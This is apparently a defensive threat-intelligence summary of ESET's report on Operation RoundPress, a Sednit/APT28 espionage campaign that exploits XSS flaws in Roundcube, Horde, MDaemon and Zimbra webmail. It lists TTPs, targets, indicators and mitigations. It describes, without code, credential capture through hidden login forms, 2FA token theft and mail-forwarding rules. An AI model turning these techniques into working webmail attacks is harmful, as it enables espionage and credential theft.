Full Report
ESET researchers uncover a Russia-aligned espionage operation targeting webmail servers via XSS vulnerabilities
Analysis Summary
# Threat Actor: Sednit (Operation RoundPress)
## Attribution & Identity
The operation, named **RoundPress**, is assessed with medium confidence to be run by the **Sednit** cyberespionage group.
**Known Aliases/Associations:** APT28, Fancy Bear, Forest Blizzard, Sofacy. Linked by the US DOJ to the GRU. Historically associated with the DNC hack (2016), TV5Monde hacking, and WADA email leak.
## Activity Summary
Operation RoundPress focuses on compromising high-value webmail servers to steal confidential data from targeted email accounts.
* **Initial Access Vector:** Spearphishing emails leveraging Cross-Site Scripting (XSS) vulnerabilities to inject malicious JavaScript code into the victim’s webmail page interface.
* **Campaign Evolution:** In 2023, the operation primarily targeted **Roundcube**. In 2024, it expanded to target **Horde**, **MDaemon**, and **Zimbra**.
* **Zero-Day Use:** Sednit utilized a zero-day XSS vulnerability for targeting MDaemon, which was patched on November 1st (version 24.5.1).
* **Historical Links:** Infrastructure links (domain/IP configuration similarity) connect Operation RoundPress to previous Sednit campaigns exploiting CVE-2023-23397. Spearphishing used an envelope-from address similar to other Sednit campaigns.
## Tactics, Techniques & Procedures
The primary payloads observed are the **SpyPress** variants (SpyPress.HORDE, SpyPress.MDAEMON, SpyPress.ROUNDCUBE, SpyPress.ZIMBRA), which are noted to be obfuscated.
- **Initial Access (via XSS Injection):** Exploiting client-side vulnerabilities in webmail software (Roundcube - e.g., CVE-2023-43770, CVE-2020-35730; also Horde, MDaemon (zero-day), Zimbra).
- **Credential Access:**
- Forced Authentication to induce credential entry (T1187).
- Web Portal Capture: Creating hidden login forms to capture credentials, tricking browsers/password managers (T1056.003).
- Multi-Factor Authentication Bypass: SpyPress.MDAEMON steals 2FA tokens and creates application passwords (T1556.006).
- **Discovery:** Account Discovery focusing on collecting email account information, such as contact lists (T1087.003).
- **Collection:** Automated collection of credentials and email messages (T1119). Remote Email Collection via mailbox scraping (T1114.002). Email Forwarding Rule setup: SpyPress.MDAEMON adds a Sieve rule to forward incoming email to an attacker-controlled address (T1114.003).
- **Command & Control:** HTTPS communication (T1071.001). Exfiltration via mail protocols/forwarding rules (T1071.003).
- **Exfiltration:** Automated Exfiltration (T1020) and Exfiltration Over C2 Channel (T1041). Data is base64 encoded before C2 transmission (T1132.001).
## Targeting
The primary objective is espionage and data theft from high-value email accounts.
- **Sectors:** Governmental entities, Defense companies, Military, Telecommunications (defense sector), Academic (environmental studies), Civil air transport company.
- **Geography:** Eastern Europe (primary focus, especially related to the war in Ukraine), Africa, Europe (General), South America. Specific countries observed include Ukraine, Romania, Bulgaria, Greece, Cameroon, Ecuador, and Serbia.
- **Victims:** Governmental entities and defense companies in Eastern Europe that are producing Soviet-era weapons destined for Ukraine. Specific entities include the Specialized Prosecutor’s Office in the Field of Defense of the Western Region (Ukraine).
## Tools & Infrastructure
- **Malware families used:** SpyPress payloads (SpyPress.HORDE, SpyPress.MDAEMON, SpyPress.ROUNDCUBE, SpyPress.ZIMBRA).
- **Infrastructure (C2/Domains):**
- Observed spearphishing envelope-from address: katecohen1984@portugalmail[.]pt
- Associated infrastructure used in 2023 (via link analysis):
- 45.138.87[.]250 / ceriossl[.]info
- 77.243.181[.]238 / global-world-news[.]net
## Implications
Sednit remains a highly capable and persistent threat actor focused on obtaining sensitive state and defense-related information, particularly concerning geopolitical conflicts (e.g., the war in Ukraine). Their willingness to leverage zero-day vulnerabilities (as seen with MDaemon) and pivot rapidly across different, commonly used webmail platforms (Roundcube, Horde, Zimbra) indicates a proactive and adaptive approach to compromise. The inclusion of 2FA bypass capabilities significantly raises the severity of successful breaches.
## Mitigations
- **Vulnerability Management:** Promptly patch all webmail servers against known XSS vulnerabilities (e.g., immediately apply patches for MDaemon 24.5.1). Monitor for new vulnerabilities affecting Roundcube, Horde, MDaemon, and Zimbra.
- **Email Security:** Enhance detection capabilities for spearphishing, specifically analyzing links/attachments within emails targeting webmail access.
- **Authentication Hardening:** Since SpyPress.MDAEMON achieves MFA bypass via token theft/app password creation, organizations must strictly enforce hardware tokens or modern phishing-resistant MFA mechanisms where possible.
- **Client-Side Defenses:** Implement Content Security Policies (CSP) on web applications if feasible, and restrict active content execution where webmail is hosted.
- **Credential Harvesting Detection:** Monitor for sudden user logouts followed by credential entry or unusual credential submissions via web portals.